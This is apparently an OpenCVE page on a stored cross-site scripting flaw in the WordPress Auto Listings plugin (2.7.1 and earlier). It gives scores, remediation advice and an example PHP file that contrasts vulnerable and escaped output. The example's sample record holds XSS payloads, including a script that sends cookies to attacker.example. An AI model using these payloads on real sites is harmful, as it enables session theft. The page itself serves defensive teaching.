Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in autolistings Auto Listings auto-listings allows Stored XSS. This issue affects Auto Listings: from n/a through <= 2.7.1.
Published: 2025-12-30
Score: 6.5 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vulnerability is an improper neutralization of input during web page generation (CWE‑79), allowing stored cross‑site scripting in the WordPress Auto Listings plugin in releases through 2.7.1. An attacker who can create or edit listing content can store markup or JavaScript that is later rendered without escaping and executes in the browsers of users who view the affected listing, potentially leading to theft of session cookies or other data, actions performed with the victim's session, defacement, or other client‑side impacts. Despite the "input" wording in the CWE title, the defect is one of output encoding rather than input validation alone: stored listing data reaches the generated page without escaping appropriate to its HTML context (text node, attribute, or URL).

Affected Systems

Affected systems are WordPress installations running the Auto Listings plugin (slug auto-listings) at version 2.7.1 or earlier. Any site that accepts listing content from users who can create or edit listings and renders that content to visitors is exposed; the advisory does not identify which listing fields are affected, so all stored listing data should be treated as untrusted until a fixed release is available.

Risk and Exploitability

The CVSS 3.1 base score is 6.5 (Medium), vector CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L: the attack is network‑reachable and low complexity, requires low privileges (an account able to submit or edit listing data), requires user interaction (a victim must view the tainted listing), and is scored with changed scope because the payload executes in the victim's browser rather than in the plugin itself. The EPSS score is below 1%, the CISA SSVC assessment recorded on this page shows no known exploitation, "Automatable: no" and partial technical impact, and the vulnerability is not listed in the CISA KEV catalog. The likely attack vector is the plugin's listing entry or edit interface; the advisory does not specify which fields are affected or the minimum WordPress role needed to reach them.

Generated by OpenCVE AI on April 29, 2026 at 12:05 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update Auto Listings to a release newer than 2.7.1 as soon as one that addresses the stored XSS is published; at the time of this page no vendor fix or workaround is recorded, so verify the installed version and monitor the plugin changelog.
  • Until a fix is available, restrict listing creation and editing to trusted roles or disable the form fields that accept user‑supplied data, and enforce sanitization before storage. Because stored XSS fires at render time, also escape listing data on output with the function for its HTML context; sanitizing on input alone does not cover data that is already in the database.
  • Implement a Content Security Policy that disallows inline scripts and limits script sources to trusted origins, mitigating the impact of any residual XSS payloads. Deploy it in Content-Security-Policy-Report-Only mode first, since WordPress core, themes and other plugins commonly emit inline scripts that an enforcing policy would block.
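The vulnerable pattern beside the hardened one, plus the input‑side sanitization and the CSP header recommended above, as an added example written for this page; it is not code from the Auto Listings plugin, from Patchstack or from OpenCVE. The listing field names ('title', 'description', 'website'), the post type 'auto-listing', the meta key '_listing_website' and the helper function names are assumptions for illustration only; the page does not document the plugin's real templates, post type or meta keys. The sample listing record is constructed.

```php
<?php
/**
 * Plugin Name: Listing output-escaping and CSP hardening (added example)
 *
 * Added example, not code from the Auto Listings plugin or from Patchstack.
 * Drop into wp-content/mu-plugins/ on a test site. The field names below
 * ('title', 'description', 'website'), the post type 'auto-listing' and the
 * meta key '_listing_website' are assumptions for illustration; the plugin's
 * real templates and meta keys are not documented on the CVE page.
 */

/**
 * Constructed sample record: what an account able to create or edit listings
 * could store. Each field carries a payload aimed at a different HTML context
 * (text node, rich-text block, URL attribute).
 */
function hardening_example_listing(): array {
    return [
        'title'       => '2019 Sedan <script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
        'description' => '<p>Low mileage.</p><img src=x onerror="alert(document.domain)">',
        'website'     => 'javascript:alert(document.domain)',
    ];
}

/** VULNERABLE pattern (CWE-79): stored data concatenated straight into markup. */
function render_listing_vulnerable(array $l): string {
    return '<h2>' . $l['title'] . '</h2>'
         . '<div class="desc">' . $l['description'] . '</div>'
         . '<a href="' . $l['website'] . '">Website</a>';
}

/** HARDENED pattern: escape on output with the WordPress helper for each context. */
function render_listing_hardened(array $l): string {
    return '<h2>' . esc_html($l['title']) . '</h2>'                          // text node
         . '<div class="desc">' . wp_kses_post($l['description']) . '</div>' // rich text, allow-listed tags only
         . '<a href="' . esc_url($l['website']) . '">Website</a>';            // URL attribute, allow-listed schemes only
}

/**
 * Defence in depth on the way in: sanitize plugin meta before it is stored.
 * WordPress core already kses-filters post_content for users without the
 * unfiltered_html capability, but custom meta fields get no such treatment
 * unless a sanitize_callback is registered for them.
 */
add_action('init', function (): void {
    register_post_meta('auto-listing', '_listing_website', [ // assumed post type and meta key
        'type'              => 'string',
        'single'            => true,
        'show_in_rest'      => false,
        // esc_url_raw() drops javascript: and any other scheme not in wp_allowed_protocols()
        'sanitize_callback' => static fn($value) => esc_url_raw((string) $value),
    ]);
});

/**
 * CSP as a backstop: no inline scripts, scripts only from this origin.
 * Sent as Report-Only first; switch the header name to Content-Security-Policy
 * once reports show no legitimate inline scripts from core, theme or plugins.
 */
add_action('send_headers', function (): void {
    $policy = "default-src 'self'; script-src 'self'; object-src 'none'; "
            . "base-uri 'self'; frame-ancestors 'self'";
    header('Content-Security-Policy-Report-Only: ' . $policy);
});

// To compare the two renderings once the mu-plugin is loaded, from WP-CLI:
//   wp eval 'echo render_listing_vulnerable(hardening_example_listing()), "\n\n", render_listing_hardened(hardening_example_listing()), "\n";'
```

In the hardened output esc_html() turns the script tag in the title into inert text, wp_kses_post() keeps the paragraph and image but strips the onerror handler, and esc_url() returns an empty string for the javascript: URL, so none of the three payloads reaches a script-executing context. The CSP is a separate layer: even if some unescaped path remains in the plugin, a script-src without 'unsafe-inline' stops the injected inline script from running in browsers that enforce the header.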

Generated by OpenCVE AI on April 29, 2026 at 12:05 UTC.

Advisories

No advisories yet.

History

Tue, 20 Jan 2026 15:30:00 +0000


Tue, 20 Jan 2026 14:45:00 +0000


Mon, 05 Jan 2026 14:15:00 +0000

Type: Metrics (values added)
cvssV3_1: {'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}
ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Mon, 05 Jan 2026 12:30:00 +0000

Type: First Time appeared (values added)
Wordpress: wordpress
Wpautolistings: auto Listings
Type: Vendors & Products (values added)
Wordpress: wordpress
Wpautolistings: auto Listings

Tue, 30 Dec 2025 11:00:00 +0000

Type: Description (value added)
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in autolistings Auto Listings auto-listings allows Stored XSS. This issue affects Auto Listings: from n/a through <= 2.7.1.
Type: Title (value added)
WordPress Auto Listings plugin <= 2.7.1 - Cross Site Scripting (XSS) vulnerability
Type: Weaknesses (value added)
CWE-79
Type: References (value added)
none listed

MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T20:41:47.920Z

Reserved: 2025-12-29T11:19:16.970Z

Link: CVE-2025-69089

Vulnrichment

Updated: 2026-01-05T13:29:44.424Z

NVD

Status : Deferred

Published: 2025-12-30T11:16:02.317

Modified: 2026-04-15T00:35:42.020

Link: CVE-2025-69089

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-29T12:15:09Z

Weaknesses